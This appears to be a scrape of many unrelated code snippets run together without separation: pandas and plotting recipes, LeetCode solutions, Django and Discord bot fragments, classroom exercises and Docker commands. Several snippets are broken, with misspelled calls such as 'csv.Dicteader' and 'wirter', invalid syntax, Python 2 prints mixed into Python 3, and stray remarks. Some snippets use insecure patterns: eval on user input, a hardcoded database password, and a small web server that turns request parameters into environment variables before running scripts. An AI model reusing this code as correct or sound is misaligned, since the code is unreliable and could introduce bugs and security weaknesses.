    txt = txt.str.replace('(\xa0)', ' ')  
    return txt
df['xxx column'] = clean(df['xxx column'])
# Download the helper library from https://www.twilio.com/docs/python/install
import os
from twilio.rest import Client


# Find your Account SID and Auth Token at twilio.com/console
# and set the environment variables. See http://twil.io/secure
account_sid = os.environ['TWILIO_ACCOUNT_SID']
auth_token = os.environ['TWILIO_AUTH_TOKEN']
client = Client(account_sid, auth_token)

message = client.messages.create(
                              from_='+15017122661',
                              body='body',
                              to='+15558675310'
                          )

print(message.sid)
from pathlib import Path
p = Path(r'../data/property_files/final_source_matching_file').glob('**/*')
files = [x for x in p if x.is_file()]
pd.set_option('display.max_columns', 500)
pd.set_option('display.max_rows', 500)
def addNums(a,b):
    summa = a + b
    return summa
class Solution:
    def addDigits(self, num: int) -> int:
        if num==0:
            return 0
        elif num%9==0:
            return 9
        else:
            return num%9

#----------------------------------------

class Solution:
    def addDigits(self, num: int) -> int:
        if num==0:
            return 0
        return 1+(num-1)%9
  
        
class Solution:
    def minDeletionSize(self, strs: List[str]) -> int:

        count = 0
        for i in range(len(strs[0])):
            w = []
            k=[]
            for j in range(len(strs)):
                d=strs[j][i]
                w.append(d)
                k.append(d)
            k.sort()
            if k!=w:
                count+=1
        return (count)


#" using unzip "

class Solution:
    def minDeletionSize(self, A: List[str]) -> int:
        d = 0
        for col in zip(*A):
            if list(col)!=sorted(col):
                d+=1
        return d
        
i was not in amood to do this
so try again
new_list = sorted(a_list, key=lambda x: (len(x), x))
mask=np.triu(np.ones_like(corr,dtype=bool))

f ,ax = plt.subplots(figsize=(11,9))
cmap=sns.diverging_palette(230,20, as_cmap=True)
sns.heatmap(corr, mask=mask, cmap=cmap, vmax=.3, center=0,
           square=True, linewidth=.5, cbar_kws={'shrink':.5})
# Solution with a temporary variable

a = input("Enter variable a: ")
b = input("Enter variable b: ")

print(f"Variable a is {a}: ")
print(f"Variable b is {b}: ")

c = a
a = b
b = c

print(f"Variable a is now {a}: ")
print(f"Variable b is now {b}: ")
public class Main {
  int x = 5;

  public static void main(String[] args) {
    Main myObj = new Main();
    System.out.println(myObj.x);
  }
}
class Person:
  def __init__(self, name, age):
    self.name = name
    self.age = age

p1 = Person("John", 36)

print(p1.name)
print(p1.age)
for p in ax.patches:
    values= '{:.0f}'.format(p.get_height())
    x = p.get_x() + p.get_width()/2
    y = p.get_height()
    ax.annotate(values, (x, y),ha='center', va ='bottom', fontsize = 11)
for p in ax.patches:
    values= '{:.0f}'.format(p.get_height())
    x = p.get_x() + p.get_width()/2
    y = p.get_height()
    ax.annotate(values, (x, y),ha='center', va ='bottom', fontsize = 11)
import warnings
warnings.filterwarnings('ignore')
def indec_query(query_name='IPC_Nacional', url='https://apis.datos.gob.ar/series/api/series?ids=145.3_INGNACNAL_DICI_M_15'):
   
    """
        Función que por defecto devuelve el IPC a Nivel General Nacional de la República Argentina en variación mensual

        Parametros
        -----------------
        query_name : str, optional
                El nombre que adoptamos para la query, el archivo csv generado llevará este         nombre
        url : str, optional
                URL de la API del generador de consultas de Nación (https://datosgobar.github.io/series-tiempo-ar-call-generator/)
        """

    r = requests.get(url=url)

    r_dict = json.loads(r.text)

    df = pd.DataFrame(r_dict['data'])

    df.rename(columns={0: 'fecha',
                                                1:query_name},
                            inplace=True)

    df.to_csv('dataset_'+query_name, index=False)
def bcra_query(variable='dolar_blue', url='https://api.estadisticasbcra.com/usd'):

    r = requests.get(url=url,
                                            headers={'Authorization':'BEARER '+bearer
                                
                            })
    r_dict = json.loads(r.text)

    df = pd.DataFrame(r_dict)


    df.rename(columns={'v': variable,
                                            'd':'fecha'},
                        inplace=True)

    #dolar_blue = df

    today = date.today()
    str(today)

    df.to_csv('dataset_'+variable, index=False)
# Load the data
churn_df = pd.read_pickle("CHURN_1.p")
g = sns.*plot 
ax = g 
for p in ax.patches:
    ax.text(p.get_x() + p.get_width()/2., p.get_height(), '{0:.2f}'.format(p.get_height()), 
        fontsize=12, color='black', ha='center', va='bottom')
from operator import attrgetter

df['duration_dataset'] = (
    df['date_1'].dt.to_period('M') -
    df['date_2'].dt.to_period('M')).apply(attrgetter('n'))
    def create(self, validated_data):
        # print(validated_data)
        tags = validated_data.pop("tags")
        language = validated_data.pop("language")
        snip = Snip(**validated_data)
        # languageObj, created = Language.objects.get_or_create(**language)
        snip.language = language
        snip.save()
        for tag in tags:
            # tagObj, created = Tag.objects.get_or_create(**tag)
            # print(tagObj)
            snip.tags.add(tag)
        return ShallowSnipSerializer(snip).data
import pandas as pd
from datetime import datetime

ps = pd.Series([datetime(2014, 1, 7), datetime(2014, 3, 13), datetime(2014, 6, 12)])
new = ps.apply(lambda dt: dt.replace(day=1))
import pandas as pd

data = {'name': ['Somu', 'Kiku', 'Amol', 'Lini'],
	'physics': [68, 74, 77, 78],
	'chemistry': [84, 56, 73, 69],
	'algebra': [78, 88, 82, 87]}

	
#create dataframe
df_marks = pd.DataFrame(data)
print('Original DataFrame\n------------------')
print(df_marks)

new_row = {'name':'Geo', 'physics':87, 'chemistry':92, 'algebra':97}
#append row to the dataframe
df_marks = df_marks.append(new_row, ignore_index=True)

print('\n\nNew row added to DataFrame\n--------------------------')
print(df_marks)
class Singleton (type):
    _instances = {}
    def __call__(cls, *args, **kwargs):
        if cls not in cls._instances:
            cls._instances[cls] = super(Singleton, cls).__call__(*args, **kwargs)
        return cls._instances[cls]

# Python 2
class MyClass():
    __metaclass__= Singleton

# Python 3
class MyClass(metaclass=Singleton):
     pass
da = da.assign_coords(year_month=da.time.dt.strftime("%Y-%m"))
result = da.groupby("year_month") - da.groupby("year_month").mean("time")
"""index.py
Usage:
  index.py serve <dir>
  index.py serve <dir> [--port=<port>]
  index.py info <dir>
  index.py (-h | --help)
  index.py --version
Options:
  -h --help     Show this screen.
  --version     Show version.
  --port=<port> Port to bind to [default: 8080].
"""
# -*- coding: utf-8 -*-

import os
import multiprocessing
import sys


import crayons
import delegator
from docopt import docopt
from flask import Flask, request, abort
from livereload import Server as ReloadServer
from whitenoise import WhiteNoise


def yield_files(dir, endswith):
    for root, dirs, files in os.walk(dir):

        # Cleanup root.
        root = root[len(dir) + 1:]

        # Exclude directories that start with a period.
        if not root.startswith('.'):
            for file in files:
                if file.endswith(endswith):
                    yield os.sep.join((root, file))


def do_info():
    """Runs the 'info' command, from the CLI."""
    pass


def convert_dir(dir):
    dir = os.path.abspath(dir)
    try:
        assert os.path.isdir(dir)
    except AssertionError:
        print(crayons.red('The directory given must be a valid one!'))
        sys.exit(1)

    return dir

def convert_port(port):
    if port is None:
        port = '8080'
    else:
        try:
            port = int(port)
        except ValueError:
            print(crayons.red('The port given must be a valid number!'))
            sys.exit(1)

    return port

def prepare_extras(request):
    extras = {}

    # 
    if request.json:
        extras.update(request.json)
    if request.form:    
        extras.update(request.form)
    
    if request.args:
        extras.update(request.args)

    extra = []

    for key, values in extras.items():
        for value in values:
            extra.append((key, value))
    
    return extra

def find(endswith, dir, path):
    found = None
    for fs_path in yield_files(dir, endswith):
        print '{0}{1}'.format(path, endswith) 
        print fs_path
        print
        if '{0}{1}'.format(path, endswith) in fs_path:
            return fs_path

def directory_listing(path):
    html = ''
    for i in os.listdir(path):
        html += '<li><a href="{0}">{0}</a></li>'.format(i)
    return html

def do_serve(dir, port):
    """Runs the 'serve' command, from the CLI."""

    # Convert dir and port to appropriate values.
    dir = convert_dir(dir)
    port = convert_port(port)

    os.chdir(dir)

    app = Flask(__name__)

    @app.route('/', defaults={'path': './'})
    @app.route('/<path:path>')
    def catch_all(path):

        # Support for index.html.
        found = find('index.html', dir, path)
        
        # Support for index.py
        if not found:
            found = find('index.py', dir, path)

        # Support for directory listing.
        if not found:
            found = find('.py', dir, path)
        

        # A wild script was found!
        if found:
            if '.py' in found:
                extras = prepare_extras(request)
            
                for key, value in extras:
                    os.environ[key] = value
                
                c = delegator.run('python {0}'.format(found))

                for key, value in extras:
                    del os.environ[key]

                return c.out

            elif '.html' in found:
                # Strip prepending slashes. 
                if found.startswith('/'):
                    found = found[1:]
                
                # Open the file, and spit out the contents. 
                with open(found) as html:
                    return html.read()

        else:
            if os.path.isdir(path):
                return directory_listing(path)

            abort(404)


    @app.before_request
    def before_request():
        app.add_files(dir, prefix='/')

    @app.after_request
    def after_request(response):
        response.headers['X-Powered-By'] = 'index.py by Kenneth Reitz'
        return response

    app = WhiteNoise(app, root=dir)
    server = ReloadServer(app)
    server.watch('{0}/**'.format(dir))

    # Alert the user.
    print(crayons.yellow('Serving up \'{0}\' on port {1}.'.format(dir, port)))
    server.serve(port=port)


def main():
    args = docopt(__doc__, version='index.py, version 0.0.0')

    if args['info']:
      do_info()

    if args['serve']:
      do_serve(dir=args['<dir>'], port=args['--port'])


if __name__ == '__main__':
    main()
with open(filename) as f:
    mylist = f.read().splitlines() 
{<key_value>: <value> for <var> in <sequence> if <condition>}
i = 1
s = 0
while i < 101:
  s= s + i  
  i =i+1
print(s)
fruit = {
  "elderberries": 1,
  "figs": 1,
  "apples": 2,
  "durians": 3,
  "bananas": 5,
  "cherries": 8,
  "grapes": 13
}

table_data = []
for k, v in fruit.items():
   table_data.append([k, v])
from random import randint
x = randint(1,10)
for Name in range (x):
    print('My Name is Hasan')
for x in range (1):
    from random import randint
    x = randint(1,51)
    print('One random number between 1 and 50: ', x)
for y in range (1):
    from random import randint
    y = randint(2,6)
    print('One random number between 2 and 5: ', y)
print("X power y is: ", x**y)
num1 = eval(input('Enter the first number: '))
num2 = eval(input('Enter the second number: '))
print('The average of the numbers you entered is', (num1+num2)/2)
students_period_A = ["Alex", "Briana", "Cheri", "Daniele"]
students_period_B = ["Dora", "Minerva", "Alexa", "Obie"]


# method 1, problematic
for students in students_period_A:
  students_period_B.append(students)
  print(students_period_B)

# method 2, more elegant
all_students = students_period_A + students_period_B
for student in all_students:
  print(student)

print(all_students)


# output 

['Dora', 'Minerva', 'Alexa', 'Obie', 'Alex']
['Dora', 'Minerva', 'Alexa', 'Obie', 'Alex', 'Briana']
['Dora', 'Minerva', 'Alexa', 'Obie', 'Alex', 'Briana', 'Cheri']
['Dora', 'Minerva', 'Alexa', 'Obie', 'Alex', 'Briana', 'Cheri', 'Daniele']
Alex
Briana
Cheri
Daniele
Dora
Minerva
Alexa
Obie
Alex
Briana
Cheri
Daniele
['Alex', 'Briana', 'Cheri', 'Daniele', 'Dora', 'Minerva', 'Alexa', 'Obie', 'Alex', 'Briana', 'Cheri', 'Daniele']
python_topics = ["variables", "control flow", "loops", "modules", "classes"]

#Your code below: 
length = len(python_topics)
index = 0
 
while index < length:
  print("I am learning about "+ python_topics[index])
  index += 1

# output 

I am learning about variables
I am learning about control flow
I am learning about loops
I am learning about modules
I am learning about classes
python_topics = ["variables", "control flow", "loops", "modules", "classes"]

#Your code below: 
length = len(python_topics)
index = 0
 
while index < length:
  print(python_topics[index])
  index += 1

# output 

variables
control flow
loops
modules
classes
with open('dict.csv', 'w') as csv_file:  
    writer = csv.writer(csv_file)
    for key, value in mydict.items():
       writer.writerow([key, value])
import tejapi
tejapi.ApiConfig.api_key = "your key"
TSMC = tejapi.get(
    'TWN/EWPRCD', 
    coid = '2330',
    mdate={'gte':'2020-06-01', 'lte':'2021-04-12'}, 
    opts={'columns': ['mdate','open_d','high_d','low_d','close_d', 'volume']}, 
    paginate=True
    )
UMC = tejapi.get(
    'TWN/EWPRCD', 
    coid = '2303',
    mdate={'gte':'2020-06-01', 'lte':'2021-04-12'},
    opts={'columns': ['mdate','open_d','high_d','low_d','close_d', 'volume']}, 
    paginate=True
    )
UMC = UMC.set_index('mdate')
TSMC = TSMC.set_index('mdate')
import ctypes
ctypes.windll.kernel32.SetThreadExecutionState(0x80000002)
ctypes.windll.kernel32.SetThreadExecutionState(0x80000000)
L = [8, 10, 6, 1]

for i in L:
    print(i)
promise = "I will finish the python loops module!"

for promises in range(5):
  print(promise)

# Output 

I will finish the python loops module!
I will finish the python loops module!
I will finish the python loops module!
I will finish the python loops module!
I will finish the python loops module!
def csReverseIntegerBits(n):
   result = 0
   while n:
       result = (result << 1) + (n & 1)
       n >>= 1
   return result
class Node:
  def __init__(self, value):
    self.key = value     # the key of the node
    self.parent = None   # the pointer to the parent node
    self.left = None     # the pointer to the left child node
    self.right = None    # the pointer to the right child node
mask = pd.to_numeric(df['Name'], errors='coerce').notnull()
df[mask] = df[mask].shift(axis=1)
print (df)
  Name  Val Rating
0  ABC  123    B +
1  DEF  234    B +
2  NaN  567     B-
3  GHI  890      D
percent_missing = df.isnull().sum() * 100 / len(df)
missing_value_df = pd.DataFrame({'column_name': df.columns,
                                 'percent_missing': percent_missing})
# Get unique elements in multiple columns i.e. Name & Age
uniqueValues = (empDfObj['Name'].append(empDfObj['Age'])).unique()

print('Unique elements in column "Name" & "Age" :')
print(uniqueValues)
import pandas as pd

# create a dataframe with one column
df = pd.DataFrame({"col1": ["a", "b", "a", "c", "a", "a", "a", "c"]})

# setting normalize=True
item_counts = df["col1"].value_counts(normalize=True)
print(item_counts)
PYTHONPATH=. poetry run pytest tests -W ignore::DeprecationWarning -W ignore::FutureWarning
>>> df2_transposed = df2.T # or df2.transpose()
>>> df2_transposed
              0     1
name      Alice   Bob
score       9.5   8.0
employed  False  True
kids          0     0
# check logs in the worker
docker logs worker --follow

# what to do when postgres No space left on device
 #Lister tous les containers 
 docker ps -a
 #Tous les down 
 docker stop id1 id2 id3 ...
 #Pruner les container 
 docker container prune
 #Pruner les image 
 docker image prune -a (modifié) 
 #Pruner les volume 
 docker volume prune
 #Supprimer les volumes non détectés automatiquement
 docker volume ls
 docker volume rm id1 id2 id3 ...
phonebook = {}
phonebook["John"] = 938477566
phonebook["Jack"] = 938377264
phonebook["Jill"] = 947662781
print(phonebook)
pd.set_option('display.max_rows', None)
pd.set_option('display.max_columns', None)
flask shell # open python shell with app running
import torch
cross_entropy_loss = torch.nn.CrossEntropyLoss()

# Input: f_q (BxCxS) and sampled features from H(G_enc(x))
# Input: f_k (BxCxS) are sampled features from H(G_enc(G(x))
# Input: tau is the temperature used in PatchNCE loss.
# Output: PatchNCE loss
def PatchNCELoss(f_q, f_k, tau=0.07):
    # batch size, channel size, and number of sample locations
    B, C, S = f_q.shape

    # calculate v * v+: BxSx1
    l_pos = (f_k * f_q).sum(dim=1)[:, :, None]

    # calculate v * v-: BxSxS
    l_neg = torch.bmm(f_q.transpose(1, 2), f_k)

    # The diagonal entries are not negatives. Remove them.
    identity_matrix = torch.eye(S)[None, :, :]
    l_neg.masked_fill_(identity_matrix, -float('inf'))

    # calculate logits: (B)x(S)x(S+1)
    logits = torch.cat((l_pos, l_neg), dim=2) / tau

    # return PatchNCE loss
    predictions = logits.flatten(0, 1)
    targets = torch.zeros(B * S, dtype=torch.long)
    return cross_entropy_loss(predictions, targets)
import requests
html = requests.get('https://google.com')

from bs4 import BeautifulSoup
soup = BeautifulSoup(product_page.content, 'html.parser')

class_book = soup.find('div', {'class': 'book'})
import tempfile

from django.core.files import File
from django.db import models


class Word(models.Model):
    word = models.CharField(max_length=200)
    audio = models.FileField(upload_to='audio/', blank=True)

    def save(self, *args, **kwargs):
        audio = gTTS(text=self.word_vocab, lang='en', slow=True)

        with tempfile.TemporaryFile(mode='w') as f:
            audio.write_to_fp(f)
            file_name = '{}.mp3'.format(self.word_vocab)
            self.audio.save(file_name, File(file=f))

        super(Word, self).save(*args, **kwargs)

#The function audio.save(self.word_vocab + ".mp3") won't work in your use case, you must use #write_to_fp or open the file created by this method, as pointed in doccumentation. I hope it helps
django-admin startproject mysite
 
python manage.py startapp myapp
import pandas as pd
import matplotlib.pyplot as plt

from pandas_profiling import ProfileReport
profile = ProfileReport(gabijos, title='Gabijos g.', html={'style':{'full_width':True}})
profile.to_file("gabijos.html")

mkdir /home/pi/.config/autostart
sudo nano /home/pi/.config/autostart/meteo.desktop


[Desktop Entry]
Type=Application
Name=Meteo
Exec=/usr/bin/python3 /home/pi/mqtt_display_temp_time_01_480.py

(firstEnv)
>>conda install -c anaconda ipykernel
>>python -m ipykernel install --user --name=firstEnv
# Iterate through each line of our list
for each_line in a_list_of_lines:
    script_line_number = script_line_number + 1
    # If an asterisk is found in the line (meaning that a character's lines are starting)
    if each_line.find("*") != -1:
        # Add the character's name to the 'character_appearance_lines' list
        character_appearance_lines.append(each_line)
        # Add the script line number to the appearance list
        character_appearance_lines.append(script_line_number)
import sweetviz as sv

my_report = sv.analyze(my_dataframe)
my_report.show_html() # Default arguments will generate to "SWEETVIZ_REPORT.html"
df_train.loc[df_train.Age.isnull(), 'Age'] = df_train.groupby(['Sex','Pclass','Title']).Age.transform('median')
import matplotlib.pyplot as plt
import numpy as np
from numpy import save

fig = plt.figure()
ax = fig.add_subplot(111)
ax.set_xlim([0, 10])
ax.set_ylim([0, 10])

points_storage=[]

def onclick(event):
    
    
    print('button=%d, x=%d, y=%d, xdata=%f, ydata=%f' %
          (event.button, event.x, event.y, event.xdata, event.ydata))
    plt.plot(event.xdata, event.ydata, 'o',markersize=5)

    fig.canvas.draw()
    points_storage.append([event.xdata, event.ydata])

cid = fig.canvas.mpl_connect('button_press_event', onclick)
plt.show()

acumulado =np.asarray(points_storage)

np.save('puntos.npy', acumulado)

print(acumulado)
from matplotlib import pyplot as plt

class LineBuilder:
    def __init__(self, line):
        self.line = line
        self.xs = list(line.get_xdata())
        self.ys = list(line.get_ydata())
        self.cid = line.figure.canvas.mpl_connect('button_press_event', self)

    def __call__(self, event):
        print('click', event)
        if event.inaxes!=self.line.axes: return
        self.xs.append(event.xdata)
        self.ys.append(event.ydata)
        self.line.set_data(self.xs, self.ys)
        self.line.figure.canvas.draw()

fig, ax = plt.subplots()
ax.set_title('click to build line segments')
line, = ax.plot([0], [0])  # empty line
linebuilder = LineBuilder(line)

plt.show()
django-admin startproject mysite

python manage.py startapp myapp
from os import walk

_, _, filenames = next(walk(mypath))
#!/usr/bin/env python
import subprocess
from multiprocessing import Pool
import os

src = "/home/student-03-474f458f89e0/data/prod"
dest = "/home/student-03-474f458f89e0/data/prod_backup"

def run_sync(file):
    print(os.path.join(dest,file))
    subprocess.call(["rsync", "-arq", os.path.join(src,file), os.path.join(dest,file)])

if __name__ == "__main__":
    files = os.listdir(src)
    p = Pool(len(files))
    p.map(run_sync, files)
#!/usr/bin/env python3

from multiprocessing import Pool

def run(task):
  # Do something with task here
    print("Handling {}".format(task))

if __name__ == "__main__":
  tasks = ['task1', 'task2', 'task3']
  # Create a pool of specific number of CPUs
  p = Pool(len(tasks))
  # Start each task within the pool
  p.map(run, tasks)
if reg_form.is_valid():
            nuevo_usuario = reg_form.save(commit=False)
            pw_hash = bcrypt.hashpw(clave.encode(), bcrypt.gensalt()).decode() 
            nuevo_usuario.password = pw_hash
            nuevo_usuario.save()
from discord.ext import commands
from os import getenv
from dotenv import load_dotenv

client = commands.Bot(command_prefix="!")
load_dotenv()

client.run(str(getenv('BOT_TOKEN')))
# this line will write the code below into a Python script called script.py
%%writefile script.py
created_at = models.DateTimeField(auto_now_add=True)
updated_at = models.DateTimeField(auto_now=True)
DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.postgresql',
        'NAME': 'dojoreads_db',
        'USER': 'postgres',
        'PASSWORD': 'root',
        'HOST': '127.0.0.1',
        'PORT': '5432',
    }
}
from requests import PreparedRequest

# ...

@client.event
async def on_member_join(member):
    if config['join_leave_message'] is True:
        channel = client.get_channel(config['join_leave_channel'])
        embed = discord.Embed(colour=discord.Colour.green())
        req = PreparedRequest()
        req.prepare_url(
            url='https://api.xzusfin.repl.co/card?',
            params={
                'avatar': str(member.avatar_url_as(format='png')),
                'middle': 'welcome',
                'name': str(member.name),
                'bottom': str('on ' + member.guild.name),
                'text': '#CCCCCC',
                'avatarborder': '#CCCCCC',
                'avatarbackground': '#CCCCCC',
                'background': '#000000' #or image url
            }
        )
        embed.set_image(url=req.url)
        await channel.send(embed=embed)
size = 30
value = 44
max_value = 100
border_l = '|'
border_r = '|'
fill = '#'
empty = '_'

bar = border_l
p = round(size*(value/max_value))
for i in range(1, p + 1):
    bar = bar + fill
ep = size - p
for i in range(1, ep + 1):
    bar = bar + empty
bar = bar + border_r

print(bar)
# -------------------------------------------------------------------------------------------
# email retrieving script
# -------------------------------------------------------------------------------------------
#!/usr/bin/env python3

import csv
import sys


def populate_dictionary(filename):
  """Populate a dictionary with name/email pairs for easy lookup."""
  email_dict = {}
  with open(filename) as csvfile:
    lines = csv.reader(csvfile, delimiter = ',')
    for row in lines:
      name = str(row[0].lower())
      email_dict[name] = row[1]
  return email_dict

def find_email(argv):
  """ Return an email address based on the username given."""
  # Create the username based on the command line input.
  try:
    fullname = str(argv[1] + " " + argv[2])
    # Preprocess the data
    email_dict = populate_dictionary('/home/{{ username }}/data/user_emails.csv')
     # If email exists, print it
    if email_dict.get(fullname.lower()):
      return email_dict.get(fullname.lower())
    else:
      return "No email address found"
  except IndexError:
    return "Missing parameters"

def main():
  print(find_email(sys.argv))

if __name__ == "__main__":
  main()


# -------------------------------------------------------------------------------------------
# Unit test script
# -------------------------------------------------------------------------------------------

#!/usr/bin/env python3

import unittest
from emails import find_email


class EmailsTest(unittest.TestCase):
  def test_basic(self):
    testcase = [None, "Bree", "Campbell"]
    expected = "breee@abc.edu"
    self.assertEqual(find_email(testcase), expected)

  def test_one_name(self):
    testcase = [None, "John"]
    expected = "Missing parameters"
    self.assertEqual(find_email(testcase), expected)

  def test_two_name(self):
    testcase = [None, "Roy","Cooper"]
    expected = "No email address found"
    self.assertEqual(find_email(testcase), expected)

if __name__ == '__main__':
  unittest.main()

my_new_list = [6, 3, 8, "12", 42]

def OrganizeList(myList):
    for item in myList:
        assert type(item) == str, "Word list must be a list of strings"
    myList.sort()
    return myList

print(OrganizeList(my_new_list))
my_list = [27, 5, 9, 6, 8]

def RemoveValue(myVal):
    if myVal not in my_list:
        raise ValueError("Value must be in the given list")
    else:
        my_list.remove(myVal)
    return my_list

print(RemoveValue(27))
print(RemoveValue(27))
def character_frequency(filename):
  try:
      f = open(filename)
  except OSError:
      return None

	characters = {}
	for line in f:
    	for char in line:
        	characters[char] = characters.get(char, 0) + 1 # get the entry for char or create a new entry with value 0 if there is no entry for char yet
	f.close()
	return characters()
        
import re

def rearrange_name(name):
	result = re.search(r"^([\w .]*), ([\w .]*)$", name)
	return "{} {}".format(result[2], result[1])
                       
#!/usr/bin/env python3
import sys
import os
import re

def error_search(log_file):
  error = input("What is the error")
  returned_errors = []

  with open(log_file, mode="r",encoding="UTF-8") as file:
    for log in file.readlines():
      error_patterns = ["error"]
      for i in range(len(error.split(" "))):
        error_patterns.append(r"{}".format(error.split(" ")[i].lower()))
      if all(re.search(error_pattern, log.lower()) for error_pattern in error_patterns):
        returned_errors.append(log)
    file.close()
  return returned_errors

def file_output(returned_errors):
  with open(os.path.expanduser("~") + "/data/errors_found.log", "w") as file:
    for error in returned_errors:
      file.write(error)
    file.close()

if __name__ == "__main__":
  log_file = sys.argv[1] # take the first parameter passed as the path of the log file
  returned_errors = error_search(log_file)
  file_output(returned_errors)
  sys.exit(0) # exits python and gives exit status of 0 here
scaled_features = data.copy()

col_names = ['Age', 'Weight']
features = scaled_features[col_names]
scaler = StandardScaler().fit(features.values)
features = scaler.transform(features.values)

scaled_features[col_names] = features
print(scaled_features)
mkdir -p ~/.config
docker run -it --name code-server -p 127.0.0.1:5050:8080 \
  -v "$HOME/.config:/home/coder/.config" \
  -v "$PWD:/home/coder/project" \
  -u "$(id -u):$(id -g)" \
  -e "DOCKER_USER=$USER" \
  codercom/code-server:latest
df_query = df_query.assign(comments='NoComment')
params = {
    'empty_line': ('', {}),
    'get_ok': ('GET 200', {'request': 'GET', 'status': '200'}),
    'get_not_found': ('GET 404', {'request': 'GET', 'status': '404'}),
}

@pytest.mark.parametrize('line,expected', list(params.values()), ids=list(params.keys()))
def test_decode(self, line, expected):
    assert decode(line) == expected
#/////////////////////////////////////////////////////////////////////////////////////////////////////////
"""This is a custom python component, and this is the description. Code something!
    Inputs:
        x: This is the description of the x input.
        y: This is the description of the y input.
    Outputs:
        a: This is the description of the a output.
"""
#---------------------------------------------------------------------------------------------------------
#_________________________________________________________________________________________________________
__author__ = "Mode Lab / Jonathan Cortes-Rodriguez"
__version__ = "0.0.2020.00.00"
__date__ = "2020.MM.DD"
#---------------------------------------------------------------------------------------------------------
#_________________________________________________________________________________________________________
"""
ghenv.Component.Name = "Component Name"
ghenv.Component.NickName = "Component Nickname"
ghenv.Component.Description = "What does this component do?"
ghenv.Component.Message = "A Tag that sits below the component"
ghenv.Component.Category = "What's my main?"
ghenv.Component.SubCategory= "What's my sub?"
"""
#---------------------------------------------------------------------------------------------------------
#_________________________________________________________________________________________________________
import re

print(re.search(r"[Pp]ython", "Python"))
print(re.search(r"[a-z]way", "The end of the highway"))
print(re.search(r"cloud[a-zA-Z0-9]", "cloudy"))

# put ^ before a character class to search for anything but the given character class
print(re.search(r"[^a-zA-Z]", "This is a sentence with spaces."))

# | as OR operator
print(re.search(r"cat|dog", "I like dogs."))
print(re.findall(r"cat|dog", "I like both cats and dogs."))
# read
with open('software.csv') as software:
	reader = csv.Dicteader(software)
	for row in reader:
    	print(("{} has {} users").format(row["name"], row["users"]))

# write
users = [ {"name": "Sol Mansi", "username": "solm", "department": "ITT infrastructure"}]
keys = ["name","username","department"]
with open("by_department.csv", "w") as by_department:
	writer = csv.DictWriter(by_department, fieldnames=keys) # requires dictionaries keys as parameter
	writer.writeheader() # create first line based on keys passed
	wirter.writerows(users)
import os

def parent_directory():

  # Create a relative path to the parent 
  # of the current working directory 

  relative_parent = os.path.join(os.getcwd(),'..')

  # Return the absolute path of the parent directory

  return os.path.abspath(relative_parent)

print(parent_directory())
def send_http_request(body):
	print('hello')
import pandas as pd

link = "https://id.wikipedia.org/wiki/Demografi_Indonesia"
df = pd.read_html(link, header=0)[2]

df = df.rename(columns={'Populasi[4]':'Populasi', 'Luas (km²)[5]':'Luas'})
df = df[['Kode BPS', 'Nama', 'Ibu kota', 'Populasi', 'Luas', 'Pulau']]

df.to_csv("Indonesia.csv", sep=',')
import pandas as pd

def wiki_to_csv(wikiurl = str):
    tname  = link.split("/")[-1]
    tables = pd.read_html(link, header=0)

    for i in range(len(tables)):
        if not tables[i].empty:
            fname = tname + " table " + str(i)
            tables[i].to_csv(fname, sep=',')
import shutil
import psutil

du = shutil.disk_usage("/")
du.free/du.total*100

psutil.cpu_percent(.1)
import random
name="Diego"
question="Do I like this cookie?"

answer=""
random_number=random.randint(1, 9) 
print(random_number)

if random_number==1:
  answer= "Yes - definetely."
elif random_number==2:
  answer= "It is decidedly so."
elif random_number==3:
  answer= "Without a doubt."
elif random_number==4:
  answer= "Reply hazy, try again."
elif random_number==5:
  answer= "Ask again later."
elif random_number==6:
  answer= "Better not tell you now."
elif random_number==7:
  answer= "My sources say no."
elif random_number==8:
  answer= "Outlook not so good."
elif random_number==9:
  answer= "Very doubtful."
else:
  answer = "Error"

print(name +"asks:" +question)
print("Magic 8-Ball's answer:"+ answer)
print("I have information for the following planets:\n")

print("   1. Venus   2. Mars    3. Jupiter")
print("   4. Saturn  5. Uranus  6. Neptune\n")
 
weight = 185
planet = 3

# Write an if statement below:
if planet ==1:
  weight = weight * 0.91
  print("Venus")
elif planet ==2:
  weight = weight * 0.38
  print("Mars")
elif planet ==3:
  weight = weight * 2.34
  print("Jupiter")
elif planet ==4:
  weight = weight * 1.06
  print("Saturn")
elif planet ==5:
  weight = weight * 0.92
  print("Uranus")
else:
  weight = weight * 1.19
  print("Neptune")
print("Your weight:", weight)
grade = 86
print("letter grade")
 
if grade >= 90:
  print("A")
elif grade >= 80:
  print("B")
elif grade >= 70:
  print("C")
elif grade >= 60:
  print("D")
else:
  print("F")
credits = 120
gpa = 1.9

if (credits >= 120) and (gpa >= 2.0):
  print("You meet the requirements to graduate!")
else:
  print("You have met at least one of the requirements.")
credits = 120
gpa = 1.8

if not credits >= 120:
  print("You do not have enough credits to graduate.")
if not gpa >= 2.0:
  print("Your GPA is not high enough to graduate.")

if not (credits >= 120) and not ( gpa >= 2.0):
  print("You do not meet either requirement to graduate!")
import pandas as pd

sheets_dict = pd.read_excel('Book1.xlsx', sheetname=None)

full_table = pd.DataFrame()
for name, sheet in sheets_dict.items():
    sheet['sheet'] = name
    sheet = sheet.rename(columns=lambda x: x.split('\n')[-1])
    full_table = full_table.append(sheet)

full_table.reset_index(inplace=True, drop=True)

print full_table
qq= dff[~df.astype(str).apply(tuple, 1).isin(dff.astype(str).apply(tuple, 1))]
def f(in_str):
    out_str = in_str.upper()
    return True, out_str # Creates tuple automatically

succeeded, b = f("a") # Automatic tuple unpacking
#nor_xr is  dataarray (var) name
datetimeindex = nor_xr.indexes['time'].to_datetimeindex()

nor_xr['time'] = datetimeindex
# rios is dataarray (var) name
rio.rename({'x': 'longitude','y': 'latitude'})
#Write an expression for a string literal consisting of the following ASCII characters:

#Horizontal Tab character
#Newline (ASCII Linefeed) character
#The character with hexadecimal value 7E

"\t\n\x7E"

#https://www.loginradius.com/blog/async/eol-end-of-line-or-newline-characters/#:~:text=LF%20(character%20%3A%20%5Cn%2C,'%20or%20'Newline%20Character'.
#https://stackoverflow.com/questions/4488570/how-do-i-write-a-tab-in-python
# Which of the following are valid ways to specify the string literal foo'bar in Python:
"foo'bar"



# How would you express the constant floating-point value 3.2 × 10-12 in Python:
3.2e-12

#Examples

0.       // = 0.0
-1.23    // = -1.23
23.45e6  // = 23.45 * 10^6
2e-5     // = 2.0 * 10^-5
3E+10    // = 3.0 * 10^10
.09E34   // = 0.09 * 10^34
2.E100L  // = 2.0 * 10^100

#How would you express the hexadecimal value a5 as a base-16 integer constant in Python?
0xa5
#Explanation base-16 is x
# integer is 0 and a5 is our value 
